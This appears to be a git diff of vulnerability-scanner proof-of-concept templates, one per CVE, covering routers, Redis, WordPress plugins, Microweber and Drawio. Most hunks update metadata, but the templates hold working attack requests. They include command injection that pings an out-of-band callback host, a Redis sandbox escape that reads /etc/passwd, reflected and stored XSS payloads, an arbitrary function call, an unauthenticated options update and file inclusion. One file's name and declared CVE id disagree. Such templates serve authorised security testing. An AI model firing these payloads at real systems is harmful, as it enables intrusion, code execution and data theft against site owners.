cve-id: CVE-2021-46422 cwe-id: CWE-78 + epss-score: 0.9462 + epss-percentile: 0.99043 + cpe: cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.1.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: telesquare + product: sdt-cs3b1_firmware shodan-query: html:"SDT-CW3B1" - verified: "true" - tags: cve,cve2021,telesquare,rce,router,injection + tags: packetstorm,cve,cve2021,telesquare,rce,router,injection,edb variables: cmd: "ping${IFS}-c${IFS}1${IFS}{{interactsh-url}}" -requests: + +http: - method: GET path: - "{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}" + matchers-condition: and matchers: - type: word part: body words: - "" + - type: word - part: interactsh_protocol name: http + part: interactsh_protocol words: - "dns" - -# Enhanced by mp on 2022/05/18 +# digest: 4a0a00473045022100d89c94c82a5311f9db9c6f0ec9f0656eceac2cc9d8858bd5c2196dc8f7dc16f602202f9c31e9d9856235670ebe95f4c29d4c02a6f81174d37e1364336a7e78723fd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-0208.yaml b/poc/cve/CVE-2022-0208.yaml index 0492fdd641..f5500b8187 100644 --- a/poc/cve/CVE-2022-0208.yaml +++ b/poc/cve/CVE-2022-0208.yaml @@ -1,51 +1,34 @@ id: CVE-2022-0208 - info: - name: WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting + name: WordPress Plugin MapPress < 2.73.4 - Reflected XSS author: edoardottt severity: medium - description: | - WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting. - remediation: | - Update to the latest version of MapPress (2.73.4 or higher) or apply the vendor-provided patch to fix the XSS vulnerability. - reference: - - https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc - - https://nvd.nist.gov/vuln/detail/CVE-2022-0208 + description: The MapPress Maps for WordPress plugin before 2.73.4 does not sanitise and escape the mapid parameter before outputting it back in the "Bad mapid" error message, leading to a Reflected Cross-Site Scripting. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0208 cwe-id: CWE-79 - epss-score: 0.00106 - epss-percentile: 0.4302 - cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: mappresspro - product: mappress - framework: wordpress - tags: cve2022,mappress,xss,wordpress,wp-plugin,wpscan,cve - -http: + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0208 + - https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc + tags: cve,cve2022,mappress,xss,wordpress,wp-plugin +requests: - method: GET path: - "{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E" - matchers-condition: and matchers: + - type: status + status: + - 200 - type: word part: header words: - "text/html" - - type: word part: body words: - "" - "Bad mapid" condition: and - - - type: status - status: - - 200 -# digest: 490a00463044022012033fcb20768f20bef0d16e03da98ce04748b210dc655f17f94645038e4d3ef022002c3f040c2c4d832d58167c68785750e1fb63ba00ffeb6b0b6e909c01071b2a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-0281.yaml b/poc/cve/CVE-2022-0281.yaml index b09f892f79..7dd988f3b2 100644 --- a/poc/cve/CVE-2022-0281.yaml +++ b/poc/cve/CVE-2022-0281.yaml @@ -4,29 +4,35 @@ info: name: Microweber Information Disclosure author: pikpikcu severity: high - description: Exposure of Sensitive Information to an Unauthorized Actor in Packagist microweber/microweber prior to 1.2.11. + description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11. + remediation: | + Apply the latest security patch or update provided by the Microweber CMS vendor to fix the information disclosure vulnerability (CVE-2022-0281). reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-0281 - tags: cve,cve2022,microweber,disclosure - metadata: - shodan-query: 'http.favicon.hash:780351152' + - https://github.com/microweber/microweber/commit/e680e134a4215c979bfd2eaf58336be34c8fc6e6 + - https://huntr.dev/bounties/315f5ac6-1b5e-4444-ad8f-802371da3505 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2022-0281 cwe-id: CWE-200 + epss-score: 0.0051 + epss-percentile: 0.73924 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microweber + product: microweber + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2022,microweber,disclosure,huntr -requests: +http: - method: GET path: - "{{BaseURL}}/api/users/search_authors" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -34,3 +40,8 @@ requests: - '"email":' - '"display_name":' condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022100876beb076e34a46ab7d43140cc9fba2343a94cf835e2f082d3ac524425a5b164022061fd8880269a24b753a505508c6b14ecf4be46a2dc9d1a4048776bb6cbde7bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-0543.yaml b/poc/cve/CVE-2022-0543.yaml index 2f61707354..00d78f467c 100644 --- a/poc/cve/CVE-2022-0543.yaml +++ b/poc/cve/CVE-2022-0543.yaml @@ -1,43 +1,35 @@ id: CVE-2022-0543 - info: name: Redis Sandbox Escape - Remote Code Execution author: dwisiswant0 severity: critical description: | - This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries. + This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The + vulnerability was introduced by Debian and Ubuntu Redis packages that + insufficiently sanitized the Lua environment. The maintainers failed to + disable the package interface, allowing attackers to load arbitrary libraries. reference: - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis - https://bugs.debian.org/1005787 - https://www.debian.org/security/2022/dsa-5081 - - https://lists.debian.org/debian-security-announce/2022/msg00048.html - remediation: Update to the most recent versions currently available. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2022-0543 - cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:* - epss-score: 0.97184 metadata: - max-request: 2 - product: redis shodan-query: redis_version - vendor: redis tags: cve,cve2022,network,redis,unauth,rce,kev - -tcp: - - host: - - "{{Hostname}}" - - "tls://{{Hostname}}" - port: 6380 - - inputs: +network: + - inputs: - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n" + host: + - "{{Hostname}}" + - "{{Host}}:6379" read-size: 64 - matchers: - type: regex regex: - "root:.*:0:0:" -# digest: 4b0a004830460221009d349fed6b3bf4fd9604533cb5f57ffcec818eda7e49ac4e7be81dc1c5a2b0b3022100902ed033bee2919852cc2e890b5a5aa71600e31aabf41f1f1f957cf4286a4cd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/05/18 diff --git a/poc/cve/CVE-2022-0594.yaml b/poc/cve/CVE-2022-0594.yaml index 556161c193..bd5afa0969 100644 --- a/poc/cve/CVE-2022-0594.yaml +++ b/poc/cve/CVE-2022-0594.yaml @@ -1,25 +1,38 @@ id: CVE-2022-0594 + info: - name: Shareaholic < 9.7.6 - Information Disclosure + name: WordPress Shareaholic <9.7.6 - Information Disclosure author: atomiczsec severity: medium - description: The Professional Social Sharing Buttons, Icons & Related Posts WordPress plugin before 9.7.6 does not have proper authorisation check in one of the AJAX action, available to unauthenticated (in v < 9.7.5) and author+ (in v9.7.5) users, allowing them to call it and retrieve various information such as the list of active plugins, various version like PHP, cURL, WP etc. + description: WordPress Shareaholic plugin prior to 9.7.6 is susceptible to information disclosure. The plugin does not have proper authorization check in one of the AJAX actions, available to both unauthenticated (before 9.7.5) and authenticated (in 9.7.5) users, allowing them to possibly obtain sensitive information such as active plugins and different versions (PHP, cURL, WP, etc.). + remediation: | + Update the Shareaholic plugin to version 9.7.6 or later to fix the information disclosure vulnerability. reference: - https://wpscan.com/vulnerability/4de9451e-2c8d-4d99-a255-b027466d29b1 - https://wordpress.org/plugins/shareaholic/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0594 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0594 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-0594 cwe-id: CWE-863 + epss-score: 0.00253 + epss-percentile: 0.63056 + cpe: cpe:2.3:a:shareaholic:shareaholic:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,cve2022,wordpress,wp,wp-plugin,exposure -requests: + verified: true + max-request: 1 + vendor: shareaholic + product: shareaholic + framework: wordpress + tags: cve,cve2022,wordpress,wp,wp-plugin,exposure,wpscan + +http: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info" + matchers-condition: and matchers: - type: word @@ -28,10 +41,13 @@ requests: - 'plugin_version' - 'shareaholic_server_reachable' condition: and + - type: word part: header words: - "application/json" + - type: status status: - 200 +# digest: 4b0a00483046022100ad680fa82672dfb33116f5fbdecf288a33462d9759b5aee4a219da0d8f3c098202210082a2ecb63d802970bfc282ace75324c3e5a69fc74cf7186b2ae428c9457de6b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-0599.yaml b/poc/cve/CVE-2022-0599.yaml index 9c91f354e8..5483685da6 100644 --- a/poc/cve/CVE-2022-0599.yaml +++ b/poc/cve/CVE-2022-0599.yaml @@ -1,10 +1,13 @@ id: CVE-2022-0599 + info: - name: The Mapping Multiple URLs Redirect Same Page WordPress plugin through 5.8 - Reflected XSS + name: WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting author: scent2d severity: medium description: | - The Mapping Multiple URLs Redirect Same Page WordPress plugin through 5.8 does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. + WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page. + remediation: | + Update to the latest version of the WordPress Mapping Multiple URLs Redirect Same Page plugin (version 5.8 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/4f1d45bc-d3bd-472c-959d-05abeff32765 - https://wordpress.org/plugins/mapping-multiple-urls-redirect-same-page/ @@ -14,8 +17,17 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0599 cwe-id: CWE-79 - tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated -requests: + epss-score: 0.00106 + epss-percentile: 0.4302 + cpe: cpe:2.3:a:mapping_multiple_urls_redirect_same_page_project:mapping_multiple_urls_redirect_same_page:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: mapping_multiple_urls_redirect_same_page_project + product: mapping_multiple_urls_redirect_same_page + framework: wordpress + tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan + +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -26,16 +38,17 @@ requests: - | GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id="> HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - req-condition: true + matchers-condition: and matchers: - - type: word - part: body - words: - - 'id="mmursp_id" value="\">" />' - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' condition: and + + - type: word + part: body + words: + - 'id="mmursp_id" value="\">" />' +# digest: 490a00463044022023cf3167ab8c79a8bd8a6ae4b1106225ec993b730d3359c06c2270b5f9842424022079d6288d5a9e4051a6a65119b847d1635a1456906a05e397bcc680d2478c7328:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-0921.yaml b/poc/cve/CVE-2022-0921.yaml new file mode 100644 index 0000000000..cd4e13baa8 --- /dev/null +++ b/poc/cve/CVE-2022-0921.yaml @@ -0,0 +1,57 @@ +id: CVE-2022-0954 + +info: + name: Microweber - Cross-site Scripting + author: amit-jd + severity: medium + description: | + Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11. + reference: + - https://github.com/advisories/GHSA-8c76-mxv5-w4g8 + - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/ + - https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0954 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-0954 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2022,xss,microweber + +requests: + - raw: + - | + POST /api/user_login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + + - | + POST /api/save_option HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}/admin/view:shop/action:options + + option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother + + - | + POST /module/ HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}/admin/view:shop/action:options + + module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B + + cookie-reuse: true + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2,"true")' + - contains(body_3,'\">\" placeholder=\"Use default') + - 'contains(all_headers_3,"text/html")' + - 'status_code_3==200' + condition: and diff --git a/poc/cve/CVE-2022-0952.yaml b/poc/cve/CVE-2022-0952.yaml index 3e068044db..02a62592d2 100644 --- a/poc/cve/CVE-2022-0952.yaml +++ b/poc/cve/CVE-2022-0952.yaml @@ -1,10 +1,13 @@ id: CVE-2022-0952 + info: - name: Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update + name: WordPress Sitemap by click5 <1.0.36 - Missing Authorization author: random-robbie severity: high description: | - The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin + WordPress Sitemap by click5 plugin before 1.0.36 is susceptible to missing authorization. The plugin does not have authorization or CSRF checks when updating options via a REST endpoint and does not ensure that the option to be updated belongs to the plugin. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress Sitemap plugin by click5 (1.0.36 or higher) to fix the missing authorization issue. reference: - https://wpscan.com/vulnerability/0f694961-afab-44f9-846c-e80a0f6c768b - https://nvd.nist.gov/vuln/detail/CVE-2022-0952 @@ -12,11 +15,19 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-0952 - cwe-id: CWE-862 + cwe-id: CWE-352 + epss-score: 0.06923 + epss-percentile: 0.93221 + cpe: cpe:2.3:a:sitemap_project:sitemap:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,cve2022,wordpress,wp,wp-plugin,sitemap -requests: + verified: true + max-request: 3 + vendor: sitemap_project + product: sitemap + framework: wordpress + tags: wp,wp-plugin,sitemap,wpscan,cve,cve2022,wordpress + +http: - raw: - | POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 @@ -36,12 +47,13 @@ requests: Content-type: application/json;charset=UTF-8 {"users_can_register":"0"} - req-condition: true + matchers: - type: dsl dsl: - - 'contains(all_headers, "application/json")' + - 'contains(header, "application/json")' - "status_code == 200" - "contains(body_1, 'users_can_register')" - "contains(body_2, 'default_role')" condition: and +# digest: 4b0a00483046022100eb97a997f88c9c9e75895f6923eb74d9357d6c183d4ed7508c18992426d3eafb022100f1b83688c7f812e45069be90d6b8f95c4b1e604f1665b10548b4365bc31171fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-0968.yaml b/poc/cve/CVE-2022-0968.yaml index 646a84a911..2c9a1e47da 100644 --- a/poc/cve/CVE-2022-0968.yaml +++ b/poc/cve/CVE-2022-0968.yaml @@ -1,35 +1,24 @@ id: CVE-2022-0968 - info: - name: Microweber <1.2.12 - Integer Overflow + name: Microweber < 1.2.12 - Integer Overflow (DOS) author: amit-jd severity: medium description: | - Microweber before 1.2.12 is susceptible to integer overflow. The application allows large characters to insert in the input field 'first & last name,' which can allow an attacker to cause a denial of service via a crafted HTTP request. - remediation: First name and last name input should be limited to 50 characters or maximum 100 characters. + The microweber application allows large characters to insert in the input field "first & last name" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. The first name & last name input should be limited to 50 characters or max 100 characters. reference: - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e/ - https://github.com/advisories/GHSA-5fxv-xx5p-g2fv - - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e - https://nvd.nist.gov/vuln/detail/CVE-2022-0968 - - https://github.com/microweber/microweber/commit/80e39084729a57dfe749626c3b9d35247a14c49e + - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H cvss-score: 5.5 cve-id: CVE-2022-0968 cwe-id: CWE-190 - epss-score: 0.00076 - epss-percentile: 0.31493 - cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* - metadata: - max-request: 3 - vendor: microweber - product: microweber - tags: cve,cve2022,overflow,microweber,cms,huntr + tags: cve,cve2022,overflow,microweber,cms variables: payload: '{{repeat("A", 600)}}' - -http: +requests: - raw: - | POST /api/user_login HTTP/1.1 @@ -46,37 +35,34 @@ http: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 thumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key= - + req-condition: true + cookie-reuse: true matchers: - type: dsl dsl: - contains(body_3,'\"first_name\":\"{{payload}}\"') - 'status_code_3==200' - - 'contains(header_3,"application/json")' + - 'contains(all_headers_3,"application/json")' condition: and - extractors: - type: regex + part: body name: form_token + internal: true group: 1 regex: - '' - internal: true - part: body - - type: regex + part: body name: user + internal: true group: 1 regex: - '' - internal: true - part: body - - type: regex + part: body name: email + internal: true group: 1 regex: - '' - internal: true - part: body -# digest: 4a0a00473045022100ade00a84685d717e711f531bf52de45ef39eb16a7683f3f91546e1915441e5930220560dc08f30548100959ed644755699a257f5ea2f1db61f4a969ec8d3d47e2b19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-1020.yaml b/poc/cve/CVE-2022-1020.yaml index 05f1f07c86..32720cd261 100644 --- a/poc/cve/CVE-2022-1020.yaml +++ b/poc/cve/CVE-2022-1020.yaml @@ -1,12 +1,9 @@ id: CVE-2022-1020 - info: name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call author: Akincibor severity: critical description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument. - remediation: | - Update WordPress WooCommerce plugin to version 3.1.2 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5 - https://nvd.nist.gov/vuln/detail/CVE-2022-1020 @@ -14,18 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1020 - cwe-id: CWE-352 - epss-score: 0.01203 - epss-percentile: 0.83615 - cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: codeastrology - product: woo_product_table - framework: wordpress - tags: wpscan,wp,wp-plugin,wordpress,cve,cve2022,unauth - -http: + cwe-id: CWE-352,CWE-862 + tags: wp,wp-plugin,wordpress,cve,cve2022,unauth +requests: - raw: - | POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1 @@ -33,7 +21,6 @@ http: Content-Type: application/x-www-form-urlencoded option_key=a&perpose=update&callback=phpinfo - matchers-condition: and matchers: - type: word @@ -41,15 +28,14 @@ http: - "PHP Extension" - "PHP Version" condition: and - - type: status status: - 200 - extractors: - type: regex + part: body group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' - part: body -# digest: 4a0a00473045022100a8a05f81974b59a392965d355bd6581ade66102441b9d375bd8b588a3363bf6d02207b829c1a3982300f49739287c5dd740022a1b5b8b9d0df6f6b5bfcfa00e70632:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/05/18 diff --git a/poc/cve/CVE-2022-1221.yaml b/poc/cve/CVE-2022-1221.yaml index 1a48ec8daf..ca0ab04ccb 100644 --- a/poc/cve/CVE-2022-1221.yaml +++ b/poc/cve/CVE-2022-1221.yaml @@ -1,54 +1,37 @@ id: CVE-2022-1221 - info: - name: WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting + name: Gwyn's Imagemap Selector <= 0.3.3 - Reflected Cross-Site Scripting author: veshraj severity: medium description: | - Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes. - remediation: | - Update to the latest version of the WordPress Gwyn's Imagemap Selector plugin (0.3.3) or apply the vendor-supplied patch to fix the vulnerability. + The Gwyn's Imagemap Selector Wordpresss plugin does not sanitize the id and class parameters before returning them back in attributes, leading to a Reflected Cross-Site Scripting. reference: - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221 - - https://nvd.nist.gov/vuln/detail/CVE-2022-1221 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1221 cwe-id: CWE-79 - epss-score: 0.00141 - epss-percentile: 0.49726 - cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:* metadata: - verified: true - max-request: 2 - vendor: gwyn\'s_imagemap_selector_project - product: gwyn\'s_imagemap_selector - framework: wordpress - tags: cve2022,wpscan,xss,wordpress,wp-plugin,wp,cve - -http: + verified: "true" + tags: xss,wordpress,wp-plugin,wp,cve,cve2022 +requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - stop-at-first-match: true - matchers-condition: and matchers: - type: word part: body words: - " popup-" - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a00483046022100d0445f901c55d0117cde9f060574efc03ac0a3ca63ca2d70323cc432b874241e022100fec4a2a786a10f32a1741d9fe1af500df38dadd43d211550cfe38c7c7cb78ec5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-1392.yaml b/poc/cve/CVE-2022-1392.yaml index 1cfaf712bd..3257dfaf96 100644 --- a/poc/cve/CVE-2022-1392.yaml +++ b/poc/cve/CVE-2022-1392.yaml @@ -1,9 +1,12 @@ id: CVE-2022-1392 + info: name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion author: Veshraj severity: high description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion. + remediation: | + Upgrade to the latest version of WordPress Videos sync PDF plugin (>=1.7.5) or apply the vendor-provided patch to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 - https://packetstormsecurity.com/files/166534/ @@ -12,13 +15,23 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-1392 + cwe-id: CWE-22 + epss-score: 0.0183 + epss-percentile: 0.86875 + cpe: cpe:2.3:a:commoninja:videos_sync_pdf:*:*:*:*:*:wordpress:*:* metadata: verified: true - tags: cve,cve2022,lfi,wp-plugin,wp,wordpress,unauth -requests: + max-request: 1 + vendor: commoninja + product: videos_sync_pdf + framework: wordpress + tags: lfi,wp-plugin,unauth,wpscan,cve,cve2022,packetstorm,wp,wordpress + +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout" + matchers-condition: and matchers: - type: word @@ -27,8 +40,8 @@ requests: - "failed to open stream: No such file or directory" - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php" condition: and + - type: status status: - 200 - -# Enhanced by mp on 2022/06/29 +# digest: 490a0046304402205f67080308c217d44c3372ef44fb06972583061e1d54b80e448c2b5fef5953b1022065343551ec8d234bf694944edd3f9813394d03a6af2123c521c2fdd63eb98623:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-1597.yaml b/poc/cve/CVE-2022-1597.yaml index 3c9b07db3c..a419e27878 100644 --- a/poc/cve/CVE-2022-1597.yaml +++ b/poc/cve/CVE-2022-1597.yaml @@ -1,38 +1,29 @@ id: CVE-2022-1597 - info: - name: WordPress WPQA <5.4 - Cross-Site Scripting + name: WPQA < 5.4 - Reflected Cross-Site Scripting author: veshraj severity: medium description: | - WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form. - remediation: | - Upgrade WordPress WPQA to version 5.4 or later, which includes proper input sanitization to mitigate this vulnerability. + The plugin, used as a companion for the Discy and Himer themes, + does not sanitise and escape a parameter on its reset password + form which makes it possible to perform reflected XSS. reference: - https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e - - https://nvd.nist.gov/vuln/detail/CVE-2022-1597 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1597 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1597 cwe-id: CWE-79 - epss-score: 0.0025 - epss-percentile: 0.62763 - cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: - verified: true - max-request: 2 - vendor: 2code - product: wpqa_builder - framework: wordpress - google-query: inurl:/wp-content/plugins/wpqa - tags: wpscan,xss,wordpress,wp-plugin,wp,cve,cve2022,wpqa + google-dork: inurl:/wp-content/plugins/wpqa + verified: "true" + tags: xss,wordpress,wp-plugin,wp,cve,cve2022,wpqa variables: user: "{{to_lower(rand_base(5))}}" pass: "{{user}}{{to_lower(rand_base(3))}}" redirect_to: '">' - -http: +requests: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 @@ -48,7 +39,6 @@ http: Content-Type: application/x-www-form-urlencoded user_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}} - matchers-condition: and matchers: - type: word @@ -57,13 +47,10 @@ http: - '{{redirect_to}}' - '"success":1' condition: and - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a00483046022100a5419ca2df78e712c32c8113f2e791f2260bee01da8917c3c2d24c2d9b9be022022100e43351469d784605a404281d2054a5b85fc43edb76778bedb508728bc967175d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-1713.yaml b/poc/cve/CVE-2022-1713.yaml index 0aeff612ed..020db3ac09 100644 --- a/poc/cve/CVE-2022-1713.yaml +++ b/poc/cve/CVE-2022-1713.yaml @@ -1,13 +1,10 @@ id: CVE-2022-1713 - info: name: Drawio <18.0.4 - Server-Side Request Forgery author: pikpikcu severity: high description: | Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information. - remediation: | - Upgrade Drawio to version 18.0.4 or later to mitigate the SSRF vulnerability. reference: - https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11 - https://github.com/jgraph/drawio/commit/283d41ec80ad410d68634245cf56114bc19331ee @@ -17,32 +14,24 @@ info: cvss-score: 7.5 